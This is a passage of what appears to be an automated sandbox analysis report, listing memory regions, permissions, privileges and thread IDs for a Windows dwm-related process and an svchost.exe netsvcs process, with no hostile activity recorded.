| private_0x0000000100370000 | 0x100370000 | 0x100370fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000100380000 | 0x100380000 | 0x10038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000100410000 | 0x100410000 | 0x100439fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000100440000 | 0x100440000 | 0x100440fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000100450000 | 0x100450000 | 0x10045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000100460000 | 0x100460000 | 0x1005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000001005f0000 | 0x1005f0000 | 0x100770fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000100780000 | 0x100780000 | 0x101b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000101b80000 | 0x101b80000 | 0x101b80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000101b90000 | 0x101b90000 | 0x101b90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000101ba0000 | 0x101ba0000 | 0x101c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000101c20000 | 0x101c20000 | 0x101c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000101c30000 | 0x101c30000 | 0x101c36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000101c40000 | 0x101c40000 | 0x101c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000101c50000 | 0x101c50000 | 0x101c50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000101c60000 | 0x101c60000 | 0x101c77fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000101c80000 | 0x101c80000 | 0x101c80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000101c90000 | 0x101c90000 | 0x101c9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x101ca0000 | 0x101fd6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000101fe0000 | 0x101fe0000 | 0x10205ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000102060000 | 0x102060000 | 0x10285ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000102860000 | 0x102860000 | 0x102917fff | Pagefile Backed Memory | r |
|
|
|
- |
| aero.msstyles | 0x102920000 | 0x102a41fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000102a50000 | 0x102a50000 | 0x102b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000102b50000 | 0x102b50000 | 0x102bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000102bd0000 | 0x102bd0000 | 0x102bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000102c00000 | 0x102c00000 | 0x102cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000102d00000 | 0x102d00000 | 0x102d00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000102d10000 | 0x102d10000 | 0x102d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000102d90000 | 0x102d90000 | 0x102e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000102e10000 | 0x102e10000 | 0x102e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000102e90000 | 0x102e90000 | 0x102e94fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000102ea0000 | 0x102ea0000 | 0x102ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000102eb0000 | 0x102eb0000 | 0x102eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000102ec0000 | 0x102ec0000 | 0x102ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000102ed0000 | 0x102ed0000 | 0x102ed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| d2d1.dll.mui | 0x102ee0000 | 0x102f21fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000102f30000 | 0x102f30000 | 0x103421fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000103430000 | 0x103430000 | 0x10382ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000103830000 | 0x103830000 | 0x103830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103840000 | 0x103840000 | 0x103840fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000103850000 | 0x103850000 | 0x103888fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000103890000 | 0x103890000 | 0x103d81fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000103d90000 | 0x103d90000 | 0x103d90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103da0000 | 0x103da0000 | 0x103da0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103db0000 | 0x103db0000 | 0x103db0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103dc0000 | 0x103dc0000 | 0x103dc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103dd0000 | 0x103dd0000 | 0x103dd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103de0000 | 0x103de0000 | 0x103de0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000103df0000 | 0x103df0000 | 0x103df4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000103e10000 | 0x103e10000 | 0x103e13fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000103e20000 | 0x103e20000 | 0x103e20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000103e30000 | 0x103e30000 | 0x104321fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104330000 | 0x104330000 | 0x104821fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000104840000 | 0x104840000 | 0x10484ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104850000 | 0x104850000 | 0x10485ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104860000 | 0x104860000 | 0x10486ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104870000 | 0x104870000 | 0x104870fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104880000 | 0x104880000 | 0x104880fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000104890000 | 0x104890000 | 0x104896fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000001048a0000 | 0x1048a0000 | 0x1048a3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000001048e0000 | 0x1048e0000 | 0x104adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104ae0000 | 0x104ae0000 | 0x104aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104af0000 | 0x104af0000 | 0x104afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104b00000 | 0x104b00000 | 0x104b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000104b10000 | 0x104b10000 | 0x104b10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000104b20000 | 0x104b20000 | 0x104b23fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104b40000 | 0x104b40000 | 0x104b43fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000104b50000 | 0x104b50000 | 0x104b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104b60000 | 0x104b60000 | 0x104ce7fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000104cf0000 | 0x104cf0000 | 0x104cf3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000104d00000 | 0x104d00000 | 0x104d00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000104d10000 | 0x104d10000 | 0x104d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104d90000 | 0x104d90000 | 0x104e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000104ff0000 | 0x104ff0000 | 0x1050effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000105160000 | 0x105160000 | 0x10516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000105170000 | 0x105170000 | 0x10517ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000105180000 | 0x105180000 | 0x10527ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000105280000 | 0x105280000 | 0x1052fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000105300000 | 0x105300000 | 0x10537ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000105580000 | 0x105580000 | 0x10577efff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000105780000 | 0x105780000 | 0x10597efff | Pagefile Backed Memory | rw |
|
|
|
- |
| staticcache.dat | 0x105980000 | 0x1069bffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000001069d0000 | 0x1069d0000 | 0x1069d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000001069e0000 | 0x1069e0000 | 0x1069e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000001069f0000 | 0x1069f0000 | 0x1069f3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff160000 | 0x7df5ff160000 | 0x7ff5ff15ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff78b6d0000 | 0x7ff78b6d0000 | 0x7ff78b6dffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff78b6e0000 | 0x7ff78b6e0000 | 0x7ff78b6effff | Private Memory | - |
|
|
|
- |
| private_0x00007ff78b6f0000 | 0x7ff78b6f0000 | 0x7ff78b6fffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff78b700000 | 0x7ff78b700000 | 0x7ff78b70ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff78b716000 | 0x7ff78b716000 | 0x7ff78b717fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b718000 | 0x7ff78b718000 | 0x7ff78b719fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b71a000 | 0x7ff78b71a000 | 0x7ff78b71bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b71c000 | 0x7ff78b71c000 | 0x7ff78b71dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b71e000 | 0x7ff78b71e000 | 0x7ff78b71ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff78b720000 | 0x7ff78b720000 | 0x7ff78b81ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff78b820000 | 0x7ff78b820000 | 0x7ff78b842fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff78b843000 | 0x7ff78b843000 | 0x7ff78b844fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b845000 | 0x7ff78b845000 | 0x7ff78b846fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b849000 | 0x7ff78b849000 | 0x7ff78b84afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b84d000 | 0x7ff78b84d000 | 0x7ff78b84efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78b84f000 | 0x7ff78b84f000 | 0x7ff78b84ffff | Private Memory | rw |
|
|
|
- |
| dwm.exe | 0x7ff78c280000 | 0x7ff78c292fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ff8e5ff0000 | 0x7ff8e6016fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7ff8e6640000 | 0x7ff8e6b84fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ff8e75b0000 | 0x7ff8e75bafff | Memory Mapped File | rwx |
|
|
|
- |
| uianimation.dll | 0x7ff8e8650000 | 0x7ff8e869afff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x7ff8e86a0000 | 0x7ff8e8851fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7ff8e8860000 | 0x7ff8e8acdfff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x7ff8e8c60000 | 0x7ff8e8cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7ff8e8d00000 | 0x7ff8e8fa2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ff8e8fb0000 | 0x7ff8e8fd1fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmghost.dll | 0x7ff8e8fe0000 | 0x7ff8e8ff5fff | Memory Mapped File | rwx |
|
|
|
- |
| ninput.dll | 0x7ff8e9000000 | 0x7ff8e905bfff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| dcomp.dll | 0x7ff8e9130000 | 0x7ff8e9200fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmcore.dll | 0x7ff8e9210000 | 0x7ff8e93e3fff | Memory Mapped File | rwx |
|
|
|
- |
| udwm.dll | 0x7ff8e93f0000 | 0x7ff8e94c2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmredir.dll | 0x7ff8e94d0000 | 0x7ff8e94fbfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ff8e9500000 | 0x7ff8e9577fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 12 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #66: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #66 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x330 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
CAC
0x
E30
0x
720
0x
6FC
0x
9D4
0x
CA0
0x
834
0x
C34
0x
53C
0x
1A8
0x
784
0x
E2C
0x
E14
0x
DE4
0x
380
0x
920
0x
91C
0x
B48
0x
7C0
0x
B40
0x
618
0x
760
0x
89C
0x
874
0x
870
0x
7E0
0x
7BC
0x
788
0x
764
0x
75C
0x
74C
0x
6F8
0x
6F0
0x
6E0
0x
6D8
0x
6D0
0x
6C0
0x
684
0x
678
0x
66C
0x
660
0x
64C
0x
648
0x
60C
0x
5F4
0x
5C4
0x
598
0x
528
0x
510
0x
280
0x
498
0x
494
0x
100
0x
138
0x
1E4
0x
168
0x
12C
0x
130
0x
124
0x
FC
0x
F8
0x
3F0
0x
3D8
0x
3D4
0x
3CC
0x
3C0
0x
39C
0x
334
0x
E88
0x
D7C
0x
E2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000ea80000000 | 0xea80000000 | 0xea83ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3940000 | 0xeaf3940000 | 0xeaf394ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xeaf3950000 | 0xeaf3950fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000eaf3960000 | 0xeaf3960000 | 0xeaf3973fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000eaf3980000 | 0xeaf3980000 | 0xeaf39fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3a00000 | 0xeaf3a00000 | 0xeaf3a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000eaf3a10000 | 0xeaf3a10000 | 0xeaf3a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000eaf3a20000 | 0xeaf3a20000 | 0xeaf3a21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xeaf3a30000 | 0xeaf3aedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf3af0000 | 0xeaf3af0000 | 0xeaf3b07fff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0xeaf3b10000 | 0xeaf3b14fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0xeaf3b20000 | 0xeaf3b2ffff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0xeaf3b30000 | 0xeaf3b32fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf3b40000 | 0xeaf3b40000 | 0xeaf3b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf3b50000 | 0xeaf3b50000 | 0xeaf3b56fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3b60000 | 0xeaf3b60000 | 0xeaf3b61fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000eaf3b70000 | 0xeaf3b70000 | 0xeaf3b70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf3b80000 | 0xeaf3b80000 | 0xeaf3b80fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3b90000 | 0xeaf3b90000 | 0xeaf3b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000eaf3ba0000 | 0xeaf3ba0000 | 0xeaf3ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000eaf3bb0000 | 0xeaf3bb0000 | 0xeaf3bb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3bc0000 | 0xeaf3bc0000 | 0xeaf3bc1fff | Pagefile Backed Memory | r |
|
|
|
- |
| iphlpsvc.dll.mui | 0xeaf3bd0000 | 0xeaf3bdcfff | Memory Mapped File | r |
|
|
|
- |
| gpsvc.dll.mui | 0xeaf3be0000 | 0xeaf3becfff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0xeaf3bf0000 | 0xeaf3bf3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0xeaf3c00000 | 0xeaf3c03fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf3c10000 | 0xeaf3c10000 | 0xeaf3c16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf3c20000 | 0xeaf3c20000 | 0xeaf3cdffff | Pagefile Backed Memory | r |
|
|
|
- |
| propsys.dll.mui | 0xeaf3ce0000 | 0xeaf3cf0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf3d00000 | 0xeaf3d00000 | 0xeaf3dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf3e00000 | 0xeaf3e00000 | 0xeaf3e7ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0xeaf3e80000 | 0xeaf3ec2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000eaf3ed0000 | 0xeaf3ed0000 | 0xeaf3ed1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000eaf3ee0000 | 0xeaf3ee0000 | 0xeaf3ee0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000eaf3ef0000 | 0xeaf3ef0000 | 0xeaf3ef6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf3f00000 | 0xeaf3f00000 | 0xeaf3ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf4000000 | 0xeaf4000000 | 0xeaf4187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000eaf4190000 | 0xeaf4190000 | 0xeaf4310fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000eaf4320000 | 0xeaf4320000 | 0xeaf441ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4420000 | 0xeaf4420000 | 0xeaf451ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf4520000 | 0xeaf4520000 | 0xeaf4522fff | Pagefile Backed Memory | r |
|
|
|
- |
| vsstrace.dll.mui | 0xeaf4530000 | 0xeaf4538fff | Memory Mapped File | r |
|
|
|
- |
| activeds.dll.mui | 0xeaf4540000 | 0xeaf4541fff | Memory Mapped File | r |
|
|
|
- |
| usocore.dll.mui | 0xeaf4550000 | 0xeaf4550fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000eaf4560000 | 0xeaf4560000 | 0xeaf4560fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf4570000 | 0xeaf4570000 | 0xeaf4570fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf4580000 | 0xeaf4580000 | 0xeaf4581fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000eaf4590000 | 0xeaf4590000 | 0xeaf4596fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf45a0000 | 0xeaf45a0000 | 0xeaf45a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| newdev.dll.mui | 0xeaf45b0000 | 0xeaf45b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf45c0000 | 0xeaf45c0000 | 0xeaf45c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf45d0000 | 0xeaf45d0000 | 0xeaf45d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000eaf45e0000 | 0xeaf45e0000 | 0xeaf45e7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf45f0000 | 0xeaf45f0000 | 0xeaf45fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4600000 | 0xeaf4600000 | 0xeaf46fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4700000 | 0xeaf4700000 | 0xeaf47fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xeaf4800000 | 0xeaf4b36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf4b40000 | 0xeaf4b40000 | 0xeaf4c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4c40000 | 0xeaf4c40000 | 0xeaf4d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4d40000 | 0xeaf4d40000 | 0xeaf4e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4e40000 | 0xeaf4e40000 | 0xeaf4f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf4f40000 | 0xeaf4f40000 | 0xeaf503ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5040000 | 0xeaf5040000 | 0xeaf504ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5050000 | 0xeaf5050000 | 0xeaf5050fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5060000 | 0xeaf5060000 | 0xeaf5060fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5070000 | 0xeaf5070000 | 0xeaf5076fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5080000 | 0xeaf5080000 | 0xeaf50fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5100000 | 0xeaf5100000 | 0xeaf51fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5200000 | 0xeaf5200000 | 0xeaf527ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5280000 | 0xeaf5280000 | 0xeaf52fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5300000 | 0xeaf5300000 | 0xeaf53fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5400000 | 0xeaf5400000 | 0xeaf54fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5500000 | 0xeaf5500000 | 0xeaf557ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5580000 | 0xeaf5580000 | 0xeaf55fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5600000 | 0xeaf5600000 | 0xeaf56fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5700000 | 0xeaf5700000 | 0xeaf57fffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0xeaf5800000 | 0xeaf588afff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf5890000 | 0xeaf5890000 | 0xeaf598ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5990000 | 0xeaf5990000 | 0xeaf5a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5a90000 | 0xeaf5a90000 | 0xeaf5b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5b90000 | 0xeaf5b90000 | 0xeaf5c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5c90000 | 0xeaf5c90000 | 0xeaf5d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5d90000 | 0xeaf5d90000 | 0xeaf5e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5e90000 | 0xeaf5e90000 | 0xeaf5ed0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5ee0000 | 0xeaf5ee0000 | 0xeaf5ee3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5ef0000 | 0xeaf5ef0000 | 0xeaf5ef1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf5f00000 | 0xeaf5f00000 | 0xeaf5ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6000000 | 0xeaf6000000 | 0xeaf607ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6080000 | 0xeaf6080000 | 0xeaf617ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6180000 | 0xeaf6180000 | 0xeaf627ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf6280000 | 0xeaf6280000 | 0xeaf637ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf6380000 | 0xeaf6380000 | 0xeaf638ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf6390000 | 0xeaf6390000 | 0xeaf639ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf63a0000 | 0xeaf63a0000 | 0xeaf63affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf63b0000 | 0xeaf63b0000 | 0xeaf63bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf63c0000 | 0xeaf63c0000 | 0xeaf63cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf63d0000 | 0xeaf63d0000 | 0xeaf63dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000eaf63e0000 | 0xeaf63e0000 | 0xeaf63e6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf63f0000 | 0xeaf63f0000 | 0xeaf63f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6400000 | 0xeaf6400000 | 0xeaf642ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6430000 | 0xeaf6430000 | 0xeaf652ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6530000 | 0xeaf6530000 | 0xeaf653ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6540000 | 0xeaf6540000 | 0xeaf654ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6550000 | 0xeaf6550000 | 0xeaf655ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6560000 | 0xeaf6560000 | 0xeaf6567fff | Private Memory | rw |
|
|
|
- |
